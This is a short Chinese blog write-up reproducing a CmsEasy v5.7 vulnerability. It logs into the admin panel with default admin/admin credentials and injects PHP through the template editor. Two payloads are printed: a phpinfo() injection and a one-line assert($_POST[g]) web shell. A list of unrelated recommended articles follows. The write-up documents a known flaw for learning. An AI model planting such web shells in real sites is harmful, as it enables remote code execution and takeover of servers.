【Web】CmsEasy 漏洞复现

访问主页

到处点一点没啥发现

扫目录

访问/admin

账号密码都是admin admin,不知道为什么,这里就先当作是默认吧

(其实都是信息检索,能在网上搜到就行hhh)

登录成功

看到左边列表有模板,心里大概有数了哈

进行一波历史漏洞的查

CmsEasy_v5.7 漏洞测试

payload1:

复制代码
1111111111";}<?php phpinfo()?>

payload2:

复制代码
11";}<?php assert($_POST[g]);?>

然而蚁剑连不上

在页面里post传g=phpinfo();可以执行

但p=system('xxx');却不能执行(没有disable_functions)

挺奇怪的,可能不是linux系统?

相关推荐
百锦再1 小时前
Razor编程中@Helper的用法大全
.net·web·blazor·tag·core·razor·helper
恰薯条的屑海鸥2 小时前
零基础在实践中学习网络安全-皮卡丘靶场(第十五期-URL重定向模块)
学习·安全·web安全·渗透测试·网络安全学习
自小吃多2 小时前
STC8H系列 驱动步进电机
笔记·单片机
Tipray20062 小时前
让敏感数据在流转与存储中始终守护在安全范围
安全
前端页面仔3 小时前
易语言是什么?易语言能做什么?
开发语言·安全
moxiaoran57534 小时前
uni-app学习笔记三十--request网络请求传参
笔记·学习·uni-app
明月醉窗台6 小时前
qt使用笔记二:main.cpp详解
数据库·笔记·qt
Shaoxi Zhang7 小时前
NVM常用命令记录
笔记
wind_one18 小时前
STM32[笔记]--1.前置准备
笔记·stm32·单片机
jackson凌9 小时前
【Java学习笔记】String类(重点)
java·笔记·学习